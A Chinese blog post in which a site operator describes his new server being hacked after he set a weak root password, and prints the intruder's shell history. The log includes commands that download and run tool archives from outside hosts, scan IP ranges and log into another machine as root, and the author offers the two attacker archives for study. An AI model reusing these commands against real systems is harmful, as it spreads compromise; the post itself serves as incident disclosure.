一台新装服务器居然有幸第一天遭黑客光顾

最近千寻影视用户量增长比较快速,服务器压力接近极限,所以新购置了一台服务器,直接买来就拉到机房安装系统的,因为新装,所以就把root密码很简单的设置了root1234,奇迹就是奇迹,第二天居然就登陆不上去了,这么短的时间内就遭黑客光顾。

这黑客好像也没干什么坏事,现把他留下的痕迹贴在这里,欢迎有兴趣的朋友钻研:

.bash_history内容,他居然没有清掉,这位朋友上来第一件事情居然就是改密码

passwd
cd /usr/games
ls -a
wget www.darkkid.webs.com/arhive/skdet.tgz ; tar zxvf skdet.tgz ; cd skdet ; chmod +x *
last -10
./bleah 187.109.205.69
./bleah 89.137.248.231
cd ..
wget whitehack.do.am/eyes.tgz ; tar zxvf eyes.tgz ;rm -rf eyes.tgz ; cd .eyes ; chmod +x * ; touch bios.txt
ls -a
last -10
./a 113.106 ; ./a 114.81 ; ./a 101.81
screen
./screen
ping 127.0.0.1
./screen -r
./screen -r
ping 127.0.0.1
w
screen -r
cd /usr/games
ls -a
cd .eyes
./screen -r
ping 127.0.0.1
w
ps x
ls -a
cd /usr/games
ls -a
cd .eyes
./screen -r
cd ..
cd scan
ls -a
cat vuln.txt
ssh -l root 222.93.115.156
nano vuln.txt
ls -a
rm -rf mfu.txt vuln.txt
ps x
cd ..
ls -a
cd .eyes
./screen -r
ping 127.0.0.1
./screen -r
ls -a
cd ..
ls -a
cd scan
ls -a
nano mfu.txt
cat vuln.txt
cd ..
cd .eyes
./screen -r
cd ..
ls -a
cd scan
nano mfu.txt
cd ..
cd .eyes
./screen -r
./screen -r
./screen -r
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ls -a
ping 127.0.0.1
./screen -r
ping 127.0.0.1
./screen -r
ls -a
rm -rf bios.txt
cd ..
ls -a
cd scan
ls -a
rm -rf mfu.txt vuln.txt
./go.sh 139
ls -a
cat vuln.txt
exit
cd /usr/games
ls -a
cd scan
ls -a
cat vuln.txt
w
cd ..
ls -a
cd .eyes
./screen -r
w
ps x
kill -9 23629
./screen
ping 127.0.0.1
./screen -r
./screen -r 3707.pts-0.localhost
./screen -r 23782.pts-2.localhost
./screen -r
ps x
ping 127.0.0.1
w
ps x
cd /usr/games
ls -a
cd .eyes
./screen -r
cd ..
cd scan
ls -a
rm -rf mfu.txt vuln.txt
cd ..
cd .eyes
./screen -r

从命令中,可以看到,这位朋友下载了两个文件,这两个文件我也附在这里,以防止未来失效

 

文件一:skdet.tgz 文件二:eyes.tgz

skdet.tgz
This entry was posted in 杂七杂八 and tagged , . Bookmark the permalink.

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


Verify Code   If you cannot see the CheckCode image,please refresh the page again!